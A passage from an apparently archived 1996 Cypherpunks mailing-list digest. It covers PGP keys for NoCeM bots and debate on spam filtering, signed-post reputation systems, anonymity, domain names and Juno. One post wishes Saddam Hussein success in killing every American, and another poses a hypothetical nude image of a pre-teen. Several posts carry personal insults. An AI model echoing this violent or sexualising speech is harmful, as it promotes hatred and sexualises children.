mQCNAzIJ6kkAAAEEAK+ug4kBmJv7amuFSjgJ9+U05JRctOxLMQvWwQA5lQIwm0wM
jTdlxA9h7l1QUry8Cah3LTCghTTpl67UPgwF4Ht2Msy6Rj8qCS49wIAKNWTIysex
dx+mfVPWl+/nVXbkgesjMbTm8Zc5fNos2Hi2YNEP3oPdI7qHnl0kDBhjlqE9AAUR
tCQ8bnljLnNlbWluYXJzLU5vQ2VNYm90QGJ3YWxrLmRtLmNvbT4=
=zZzz
-----END PGP PUBLIC KEY BLOCK-----

Public key for <rec.humor-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIJ2hoAAAEEAKwXMPkoGemZgPoQwyLLyK+Pq951FAPb/YuEQ4ZMd2wfm0jo
nR+DrmCkCmIyH0OIbSuXRCXeLdO+tN91DdqCvAQA/FbKVUkLSxSS4eMRC5O9GVF9
Y+hY5NzIk3hPS9HLtPqZd4nlO//qi6vk4xXxHxqpEMssnWNBdTmuqP6x4FMlAAUR
tCE8cmVjLmh1bW9yLU5vQ2VNYm90QGJ3YWxrLmRtLmNvbT4=
=fTWy
-----END PGP PUBLIC KEY BLOCK-----

Public key for <sci.math-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIJ688AAAEEAOZtfqm48a0q/eXlVXeE3v4+8oceIPBHvnOoulrsDmH1KQzv
vCwZrQP1d+Q/I1Sbk6kE7FLWva77Pmr+cRzv8pRA52HYNFZinu62g8sXtTHeX67J
Jb3woVg1ZlHNxzUHQ4lSXE1GZ2x08OjuOpEPBIVsGxUfGJzYRTLKBVWUZJPVAAUR
tCA8c2NpLm1hdGgtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=so64
-----END PGP PUBLIC KEY BLOCK-----

Public key for <sci.physics-NoCeMbot@bwalk.dm.com>:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIJ70UAAAEEAMNuejWXicbK3jSpBGXQeSYmIT2+XENPwXMxKIJIGtOJ5ILo
WRu3r1Q1QkFKJJ3u68PDQfGYeisLvnpqLqGZoyhWiGqPkN4OxNtFku1L72MDwbF+
4XqxFtxzOLeH/lFc7MQDTji4nbMgUD0GXBsNITRZ+YyvpnrVd4z0ceX+vLURAAUR
tCM8c2NpLnBoeXNpY3MtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=9q4g
-----END PGP PUBLIC KEY BLOCK-----

> It's really getting to the point where the time-honored
> suggestion of "just hit your delete key" cannot deal with the
> obverwhelming amount of Drek posted, much of it with subject
> lines deliberately designed to blend in with the newsgroup
> topic.

Are you talking about newsgroups or mailing lists? I don't find
reading newsgroups a problem with the proper software. I am somewhat
annoyed by the trash I get via e-mail, especially from this mailing
list (lies, off-topic rants, personal attacks from Tim May (fart)).

> Just being able to filter out posts from Net addresses that
> don't correspond to real identifiable humans posting under
> their legal names would be a good first step.

You have got to be fucking kidding! Some of the most interesting
Usenet articles in hostory were posted anonymously.

> Purely voluntary, of course, since any filtering would be
> done at the reading end, and people could still post anything
> they liked.

Yes - people should be able to post anything they like to Usenet,
including spam, and other people should be able to submit voluntarily
to other people's "censorship" if they choose to. NoCeM's do this
very nicely.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 14 Sep 1996 11:33:04 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae5f0a3c0d021004fdbe@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960913203928.3483A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Timothy C. May wrote:
> 
> The 70% already _are_ cutting the throats of the other 30%. It's called a
> 60%+ tax rate. This is the sum of: federal income tax, state income tax,
> city tax, sales tax, gas tax, energy tax, property tax, entertainment tax,
> special excise taxes on alcohol, cigarettes, etc., and miscellaneous other

I'm not sure how you get to 60%; I assume you're talking average tax 
rate, not marginal; whenever I've tried to figure out my average rate, 
even in California, it never went above ~31%. This included a pack of 
fags a day, which is the most heavily indirect taxed item in your list.

If you're smoking enough to get up to 60%, you've got worse problems than 
taxes :)

Simon
  p.s. 

   Is anyone on cpunks working at Harry Browne's hq in DC?  Some friends in
Carolina asked me to pick up some bumper stickers and stuff before I 
leave the District.


---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 14:08:46 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <Pine.SUN.3.94.960913202014.2637A-100000@polaris>
Message-ID: <VZ28TD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> Seriously, what is the import of the "real identifiable human" or the
> "posting under their legal names" point?

I'm sure certain parties out there would like that.

> If an AI program posts quality stuff, what's the difference?

Indeed, an AI program I wrote has been posting excellent stuff in
alt.sci.physics.plutonium - check it out! :-)

> Why the import of true "legal" names?  Why not simply develop reputation
> signatures?

Right now I let all my incoming e-mail collect in one queue.
If I were really bothered by junk e-mail, I'd set up some sort of
filtering that would sort them into three classes by originator:

to be deleted without reading
to be read as soon as possible
to be read at my leisure

the default, for unknown originators, would be to be read at my leisure.

> What your suggestion basically says is "instead of developing our own
> decentralized reputations system for filtering lets use one already in
> place, i.e. the state Department of Motor Vehicles.

If the situation with junk e-mail becomes much worse than it is now,
then I think we'll end up with the following scenario:

1. A spammer gets my name, Igor Chudov's name, and a bunch of other names
from our Usenet postings.

2. The spammer e-mails each one of us, offering to buy X-rated videos.

3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting
'bot that this e-mail should be junked.

4. If my 'bot sees the spammer's mail, it junks it.

And I'd do the same for him if I saw it first. :-) Naturally the warning about
junk e-mail needs to be digitally signed. I suppose they could be posted in a
specially designated Usenet newsgroup. The e-mail-sorting 'bot would check
this newsgroup for signed junk-mail notices from trusted parties and junk the
matching e-mails from the incoming queue. I guess it'd have to look at the
body of the mail and not just the headers, which are easy to vary.

This is the kind of project cypherpunks would do if they were writing code,
instead of lies and personal attacks, the way Tim May (fart) does.

> In any event, getting reputation credentials from a decentralized "web of
> trust" is a much more efficient answer, especially where you can assign
> your own levels of trust to each signator.

Yes - take a look at the NoCeM project for Usenet at http://www.cm.org.
Perhaps this technology can be adapted for rating e-mail.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zac <lspeidel@earthlink.net>
Date: Sat, 14 Sep 1996 14:24:48 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609140428.VAA02592@iberia.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 14 Sep 1996 12:14:59 +0800
To: cypherpunks@toad.com
Subject: Re: common sense (fwd)
Message-ID: <199609140236.VAA03531@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 13 Sep 1996 11:33:24 -0700
> From: Dale Thorn <dthorn@gte.net>
> Subject: Re: common sense
> 
> HipCrime wrote:
> > And rather than "dispensing drugs in clinics," why not simply
> > scrap the drug laws entirely?  People have a *right* to do as
> > they please with their bodies.
> > Let's hear it for common sense.  It's the first decent posting I've
> > seen to this list.
> > -- HTTP://www.HIPCRIME.com
> 
> A question for you: In the Civil Rights era (1960's mostly), we dealt 
> with the question of whether people had the "right" to not only choose 
> their neighbors, but whether they could extend that logic, so once they 
> move in, whether they could "enforce" the status quo by preventing other 
> people from moving in if those other people didn't "fit in" somehow.
> 
> If drugs and/or other items of Vice are liberalized, there will be a 
> tremendous marketing opportunity created, and new stores and new 
> departments within existing stores will pop up everywhere offering the 
> newly-liberalized goods and services. So my question is, since there are 
> "dry" areas in the country now, where the citizens can vote to exclude 
> alcohol sales, for example, will drugs, prostitution, gambling, etc. 
> fall within the purvey of citizen democracy as in the "dry" county 
> example, or will there be new problems with this analogy, and will any 
> of those new problems relate to the Civil Rights issues I mentioned 
> previously?
> 

History already has examples of such incidences. Alaska, California, and
other states have tried various levels of legalization. To date I believe
that all such experiments have ended because of federal pressure on the
uncooperative states.

The Indians 'right by treaty' to operate gambling casino's is another good
example of a contemporary situation.

                                                    Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sat, 14 Sep 1996 14:47:23 +0800
To: Admin <rjj@medialab.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609131941.NAA15578@rintintin.Colorado.EDU>
Message-ID: <v03007802ae5fe84e82a0@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


>>At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
>>cypherpunks@toad.com and remailer-operators@c2.org:
>>>As I said having a website invites comments.  It's like being a
>>>public figure.  In effect you are publishing your e-mail address.
>>
>>
>>Interesting perspective.  However, placing an email address on a web page
>>is by no means an offer to take "comments" (i.e., marketing spams) on
>>anything that strikes the spammer's fancy.
>
>How would you know what the *intent* of these other people is in placing
>mailme: tags on their public pages unless you have been to the specific
>pages. You speak only for yourself, yet you try to imply that you speak for
>everyone on the www who has placed a mailto: tag on their pages.
>

I think this is exactly the point. On a given page I might have several
mailto tags. One for comments on some subject, one for feedback, and one
for the webmaster. I expect the person mailing me to take the time to use
the correct mailbox. I created a page urging political activism, and
included a mailto for all the relevant Senators and Representatives. I
hardly think they are interested in this kind of spam.

Trawling the web for every address you can find, then mailing them all
seems very inappropriate.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 14 Sep 1996 15:11:01 +0800
To: cypherpunks@toad.com
Subject: Re: Child Porn as Thoughtcrime
Message-ID: <v02130500ae5f8ef9ebb6@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


What if someone combined images now generally considered pornographic under
current U.S. law, with a pressing political message.  For example, a nude
pre-teen holding a picket sign saying "F*** Censorship."  How would the
courts separate the protected speech (content) from the sexual (context)?



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 13:06:08 +0800
To: cypherpunks@toad.com
Subject: Re: unwanted mail..what can I do?
In-Reply-To: <960913194609_522174372@emout17.mail.aol.com>
Message-ID: <Ho68TD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


AwakenToMe@aol.com writes:

> I recieved mail from netfree.com..
> I tried mailing it back (it def. had a forged address, but I got the netfree
> from the mail header.....)
> So anyway..... I tried sending to root@netfree....my mail was rejected (not
> unknown ...it was rejected by the system) said it wasnt authorized... so I
> tried support@netfree...same thing.
> It ISSSSS rather annoying...any sugestions?

Yes, a bunch of them:

1. Get a life. Learn to delete unwanted e-mail. Get a real shell account.

2. Ask AOL to let its users decide what e-mail to reject automatically (like
procmail). They've been promising this capability by the end of September.
Then you can set up your account to get no more e-mail from netfree.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 14 Sep 1996 13:49:55 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <Pine.SUN.3.94.960913202014.2637A-100000@polaris>
Message-ID: <Pine.BSF.3.91.960913223151.7410A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Well, it would seem some are helping to make my point; M.Duvos is calling 
for government intervention, in the form of an "Internet Driver's License."

There goes anonimity, which has, in general, been a "good thing" on the 
'net. Here comes "big brother", to protect us from the evil anonymous 
spammer. Here comes more government infrastructure to enforce the LAWS 
that "we", as a society, have subjected ourselves to, so that "the few, 
the rude, the clueless" can no longer send out their anonymously sourced 
spam. Less freedom, more taxes. Why? Because someone out there is doing 
something because they "have the right", by the sole virtue of there 
currently being no law specifically against their particular behavior.

Still on the side of the spammer, Mr. May?

On Fri, 13 Sep 1996, Black Unicorn wrote:

> On Fri, 13 Sep 1996, Mike Duvos wrote:
> 
> > Bill Stewart writes:
> > 
> > > Anybody for an Internet Driver's License?
> 
> [Too much spam, some designed to avoid filtering by humans or machines]
> 
> > Just being able to filter out posts from Net addresses that
> > don't correspond to real identifiable humans posting under
> > their legal names would be a good first step.  
> 

Am I not an identifiable human? Is Black Unicorn an AI? Would I be 
acceptable if I posted as JohnSmith@mcfeely.bsfs.org? 

> In any event, getting reputation credentials from a decentralized "web of
> trust" is a much more efficient answer, especially where you can assign
> your own levels of trust to each signator.
> 
> Mr. Duvos' idea is, in my view, a step backwards.

If you consider increased legislation a step backwards. How else can we 
determine what we, as free people, can/can't/should/shouldn't do?
(Sarcasm)

Of course it is a step backwards; the ability to discuss sensitive 
issues, and obtain information anonymously has been of great social 
benefit. Yet another freedom soon to be legislated away (See "Georgia, USA").

Still failing to see the cause-and-effect relationship, folks?

When even some on c'punk readers are calling for manditory identification, 
where do you think the great unwashed position themselves?

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 13:13:17 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <32399C94.23FD@gte.net>
Message-ID: <cV68TD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> First of all, soldiers are just the little guys, like you and me, no
> more "Nazis" than "Communists" or whatever we Americans are in the eyes
> of the third world, etc.

Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers
are murderous scum. I wish Saddam Hussein the best of luck in killing every
American he can get.

P.S. Please do not cc: me.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 13:17:24 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <199609140150.SAA09043@netcom15.netcom.com>
Message-ID: <4c78TD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:
> Let's develop our own decentralized reputations system for
> filtering.  Could we have it installed in the "sci" and "comp"
> hierarchies by tomorrow morning please?

I've been issuing NoCeM notices for off-topic traffic in several Usenet
newsgroups. (Not in the last few days because we get the Usenet feed from
panix.com, who's been hit with the SYN attack and stopped sending us news.)
Look at the existing technology - it works pretty well. All you need is
more people issuing notices about what's worth reading and what's not in
more newsgroups. Then you can pick and choose whose notices to honor.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 14 Sep 1996 13:59:23 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <VZ28TD8w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.960913225312.7410B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

<Some SNIPPED>

> If the situation with junk e-mail becomes much worse than it is now,
> then I think we'll end up with the following scenario:
> 
> 1. A spammer gets my name, Igor Chudov's name, and a bunch of other names
> from our Usenet postings.
> 
> 2. The spammer e-mails each one of us, offering to buy X-rated videos.
> 
> 3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting
> 'bot that this e-mail should be junked.
> 
> 4. If my 'bot sees the spammer's mail, it junks it.
> 
> And I'd do the same for him if I saw it first. :-) Naturally the warning about
> junk e-mail needs to be digitally signed. I suppose they could be posted in a
> specially designated Usenet newsgroup. The e-mail-sorting 'bot would check
> this newsgroup for signed junk-mail notices from trusted parties and junk the
> matching e-mails from the incoming queue. I guess it'd have to look at the
> body of the mail and not just the headers, which are easy to vary.
> 
<Dr.D.V.KOTH Standard T.C.May reference deleted>

> 
> > In any event, getting reputation credentials from a decentralized "web of
> > trust" is a much more efficient answer, especially where you can assign
> > your own levels of trust to each signator.

Nice concept, but it isn't that hard to slightly alter each message; now 
you've also got to determine which are "the same" messages,and which are 
not. Why would the headers be easier to vary than the body? Tack a few 
extra one-liner pieces of add copy on the end in pseudo-random order, and 
you've got "different" messages.

How do you view this specially designed newsgroup as working? Will you 
need to fetch all notices on a regular basis, and use the "warnings" to 
sort your mail? Seems like it would take longer to alter your trust level 
of third parties than it would take for your "opponent" to crank up 
another aol trial disk ...

Looks like a lot of work ahead. :)

- r.w.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 14 Sep 1996 04:17:48 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: 56 kbps modems
In-Reply-To: <Pine.HPP.3.91.960913140446.12376A-100000@cor.sos.sll.se>
Message-ID: <Pine.WNT.3.94.960913232122.-410977C-100000@enzohome.ima.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Asgaard wrote:

> >U.S. Robotics and Rockwell International are planning new modems with
> >speeds up to 56 kbps a second, almost double the speed of the fastest
> >rate now available.  The new devices should be available by the end of
> >the year, although their top speed initially may be less than 56 kbps.
> >(Wall Street Journal 12 Sep 96 B11)
> 
> People who seemed to know used to say that 'the Shannon limit'
> set an absolute upper limit around 40 kbps. Has Shannon been
> proven wrong, or what?

Well, it all depends on the signal-to-noise ratio. Also, if the noise is
not white gaussian the situation can be even better.

Enzo






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 14 Sep 1996 16:21:07 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
Message-ID: <199609140644.XAA13526@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

 > Well, it would seem some are helping to make my point;
 > M.Duvos is calling for government intervention, in the form
 > of an "Internet Driver's License."

Nothing to do with the government.  If people choose to
voluntarily obtain a key with which to voluntarily sign their
posts, and I set my newsreader to present only articles which
correspond to keys having certain criteria, all is well and good.

Anyone can still post anything they like, including unsigned
articles, and the filter is at the reading end, which is where it
should be.

A given key could mean "I am Mike Duvos", "I am Tim May", or "I
am Dorothy Denning." Or it could mean something more obscure,
like "I showed my driver's license to get this key", or "10
leading Cypherpunks think I'm a Nym worth listening to", or even
"I donate regularly to the 700 Club."

 > There goes anonimity, which has, in general, been a "good
 > thing" on the 'net. Here comes "big brother", to protect us
 > from the evil anonymous spammer.

Bullfeathers.  Encouraging people to sign posts, and permitting
newsreaders to select based on signature characteristics is about
as big a threat to anonymity as a procmail file which filters out
everything having an anon remailer disclaimer attached to it.

 > Here comes more government infrastructure to enforce the
 > LAWS that "we", as a society, have subjected ourselves to,
 > so that "the few, the rude, the clueless" can no longer send
 > out their anonymously sourced spam.

They can spam all they want.  They can be as rude and clueless as
they wish.  It hardly requires additional government
infrastructure if *I* want to only read posts signed by keys
endorsed by persons or organizations I trust.

 > Less freedom, more taxes.

How one moves from a system of voluntarily signing Usenet posts
to more taxes is beyond my ability to comprehend.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 14 Sep 1996 15:09:42 +0800
To: cypherpunks@toad.com
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <9609140531.AB04951@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Sep 96 at 13:37, Admin wrote:

>
> >Also, I charge $500 per message.  I've always liked flat fees. :-)

> >------- Forwarded Message -------
> >At 21:50 9/11/96, Ross Wright <rwright@adnetsol.com> wrote to
> >cypherpunks@toad.com and remailer-operators@c2.org:

> >Unsolicited advertising/promotional email proofread for
> >$500/message!  Your sending such a message to me is an explicit
> >request for my services!


> Inane, off-thread, unsupported weak analogous attempts at reasoned
> argument received, but not read - simply deleted, for $1000/message.
> Sending OR posting the above to me or a Newsgroup that I may happen
> to read constitutes your accord and acceptance of the above
> contract. If I must read them, the fee is $2000/message.

Geeee...  I am *truly* clueless with my 0.1 g of pure gold per e-mail 
deleted.  

As of today, take notice, I'm increasing my rates to 2 ounces of 
99.99+ pure gold per received and deleted e-mail.

jfa
Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 14 Sep 1996 15:38:21 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
Message-ID: <9609140557.AB05688@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Sep 96 at 22:51, Rabid Wombat wrote:

> When even some on c'punk readers are calling for manditory
> identification, where do you think the great unwashed position
> themselves?

As Auric Goldfinger :) once said:
	Once is happenstance...
	Twice is coincidence...
	The third time is enemy action!

jfa
Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 14 Sep 1996 19:34:26 +0800
To: Law &amp; Policy of Computer Communications              <CYBERIA-L@LISTSERV.AOL.COM>
Subject: Re: Domain names - Alternic - Authority
Message-ID: <199609140915.CAA28221@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(The Top-Level Domain Name Wars have been breaking out in Cyberia-L,
not a usual place for technical discussion, plus popping up and down
in Cypherpunks.  Hope y'all don't mind me mixing this to both.)

Back when domain names first came in, a number of us didn't believe
that a centralized organization could pull it off, especially when
it was being done by a collaboration of the US military types
and the European Phone Companies, who were well known to be clueless.
The email world wasn't just the ARPAnet, it included all of UUCP-land,
PCs were starting to occupy their spaces, and there were various
DECish things and Berknets and other radically non-conformable 
architectures and overlapping namespaces.  UUCPland worked because a few 
dedicated people, mainly at Bell Labs and some universities, with lots 
of time and non-beancounted-non-billed funds, kept track of where 
machines lived, phone-polled sites that couldn't afford it, 
tried to keep track of which of the umpty-seven machines named "bilbo"
or "mozart" could talk to which others so you could occasionally
get mail to someone who lived at ucbvax!allegra!mozart!zorro!bilbo!gandalf
and know it was the same bilbo!gandalf you'd talked to last week
and maybe get mail to people reliably across complex paths.
        Pathalias was a cool program that took link data and Dijkstra'd it
        together into a relatively connected bunch of shortest paths.

The idea that Somebody Thought They Were In Charge was annoying to
many of us, especially Somebody Bureaucratic.  Peter Honeyman
set up a bunch of his machines as the .FUN domain for a while;
it was run by fun people.  Rob Pike and Ken Thompson later wrote a
marvelous technical rant called "The Hideous Name" about how
locally-based addressing makes far more sense than global -
it both reflects reality and lets the decisions about naming
and such be made by the people and processes that need to make them.

Well, domain names eventually became a raving success, just because
it was so much easier to say where someone was (administratively,
if not physically) than to guess how to get there hop-by-hop.
Separating administrative addresses from routing was an important
mental step.  Stuff like .BITNET and .CSNET were workable,
.UUCP had its real problems but eventually became sort-of-defined
relative to uunet, a machine set up as a research project that
had turned into a small business.

One of the things that made it work well was that any given machine
only had to know a manageable amount of stuff - you needed your own
subdomains, a path to the top of your organization, a way to recognize
that given patterns were high-level domains, and a path to the 
Root Servers - plus you needed somebody Higher Up to enter your
name and address in their administrative database so other people
could find you.  It's easy to find where to look among a few hundred
entries (a few technically-cooperative countries, a few zones for
non-countries, and a few hundred countries that didn't really have email :-)
Occasionally a country comes on board that your internal
nameservers didn't recognize, and you need to get your administrator
to add .nl or .kr or whatever.

>From that relatively short list, which you don't need any blazingly
complex database to administer, you can get anywhere.  The standard
DNS BIND tries to solve a bunch of complex _local_ problems and
work portably in many different environments, but doesn't need
to be tuned blazingly complexly to work almost anywhere.
The systems that need to go beyond that are the servers for .com
and to some extent .edu, which have to keep track of a lot more sites,
and places that have complex internal structures or are trying to
solve fancy problems like mobile users.   But www.joesgarage.com
doesn't need to do most of that.

I think polluting the top-level domain name space is a bad move.
While geographically-based names aren't a great choice for
representing non-small organizations, they're short, and if you
open up the entire top-level you just complicate everyone's life
and in a year or two you'll have as many people carving out space 
at the toplevel as you currently have in .com, raising the ego levels
without making the name space any bigger.  Now, I suppose there's a
certain nice philosophical position of being able to say
"You're .gov.fr - we're .microsoft, and we're at a higher level than you!"
or "You're .gov.uk - we're .gov.AnTir, and everybody in _our_
kingdom is there because they want to be!"


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 14 Sep 1996 19:20:00 +0800
To: cypherpunks@toad.com
Subject: Juno Newbies are Great!
Message-ID: <199609140915.CAA28224@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


OK, there are lots of spammers, clueless newbies, and  wannabes there.
There are some cool things about Juno
- it's free.  Anybody can get on it.  Easily.  Anonymously, more or less,
        since they don't need to have your whole credit history
        to be able to charge you money.  At most you need a maildrop.
- it's free.  Anybody can get on it.  Without a government.
        Without a bureaucracy from Washington who are Here To Help Us
        Provide Universal Access to the Nationalist Infotainment 
        Infrastructure.   Without telling us how to run _our_ systems.
- it's free.  Anybody can get on it.  Anybody can try to compete.
        There aren't any subsidies, so there aren't any rules,
        except the usual "make sure you've got positive cash flow soon"
        and "reputation capital can sell lots of stock."
- it's free.  Nobody has to be on it.  If you don't like the management,
        you can bail, with minimal investments, and go find better.
- it's free.  Nobody has to be on it, unlike a government-run NII
        that you need to pay your taxes, do your banking, register cars,
        keep your draft card up to date and your papers in order,
        and can get thrown off if they suspend your Internet Driver's
        License for six months.
- it's free.  _I_ don't have to pay for it if I don't want it.
- it's free.  Any newbie, spammer, or 3133T D00D can get on it,
        act as stupid as they want, and it's ok, because the public
        knows (or will soon enough) that clueless people live there
        and not to take any email from juno.com too seriously -
        it's not like mail from whitehouse.gov or kremvax.su or cnn.com
        that you know you'd better read and believe every word of.
        It's as accurate as the National Enquirer, it's the
        Net Of A Million Lies, and like Television, nothing to panic over.

So, like, relax, chill out, and get procmail or BozoWatch or some other 
filter, and you not only can get rid of most of the junobots,
you can use it to get rid of lots of other spam, and use that
new Distributed Reputation Service Platform that Anon@juno.com
is developing to find the interesting 100 messages per day of the
1000 you receive.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 14 Sep 1996 18:59:54 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Erasing Disks
Message-ID: <199609140915.CAA28227@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 PM 9/11/96 -0700, you wrote:
